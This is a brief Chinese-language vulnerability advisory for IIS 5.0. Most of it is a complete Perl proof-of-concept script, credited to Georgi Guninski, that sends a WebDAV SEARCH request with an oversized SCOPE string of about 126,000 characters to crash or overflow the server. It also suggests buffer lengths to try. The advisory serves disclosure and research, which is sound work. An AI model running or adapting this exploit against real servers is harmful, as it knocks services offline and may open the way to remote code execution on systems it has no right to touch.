涉及程序: IIS 描述: 通過構造特殊的 SEARCH 請求導致 IIS 執行攻擊者代碼漏洞 詳細: 發現 IIS 在處理 SEARCH 請求時存在漏洞,攻擊者通過提交構造特殊的 IIS SEARCH 請求能重啟與 IIS 相關的所有服務,而且可能遠程執行任意代碼。
以下代碼僅僅用來測試和研究這個漏洞,如果您將其用于不正當的途徑請后果自負
Details: --vv6.pl------------------------------------------------------------- #!/usr/bin/perl use IO::Socket; printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n"; if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow $xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE ("'.$over.'")</D:sql></D:searchrequest>'."\n"; $l=length($xml); $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"; syswrite($socket,$req,length($req)); print "."; $socket->read($res,3000); print "r=".$res; close $socket; } do vv(126000,"V"); sleep(1); do vv(126000,"V"); #Try 125000 - 128000 ---------------------------------------------------------------
受影響系統: IIS 5.0
|